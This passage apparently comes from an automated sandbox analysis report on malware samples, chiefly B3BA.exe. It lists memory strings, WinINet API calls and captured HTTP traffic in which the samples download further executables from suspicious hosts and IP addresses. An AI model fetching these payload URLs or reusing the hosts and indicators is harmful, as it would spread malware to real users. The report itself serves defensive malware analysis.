                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.663930181.0000000002F30000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: explorer.exe, 00000005.00000000.373648113.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.391811922.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403574937.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeMz
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: B3BA.exe, 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, B3BA.exe, 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                          Source: B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab4
                          Source: B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                          Source: svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                          Source: svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: svchost.exe, 0000001C.00000003.498191855.000002392257F000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                          Source: svchost.exe, 0000001C.00000003.498147484.00000239225A7000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498274252.0000023922A02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498236848.0000023922590000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498191855.000002392257F000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498105135.00000239225A7000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                          Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,HeapCreate,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET /3.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /advert.msi HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: GET /123.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /442.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /443.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /45512.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/4457553c06dee2e98e4f451cad0abfa16d7760a4 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /File.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /512412.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /RM.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 18 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
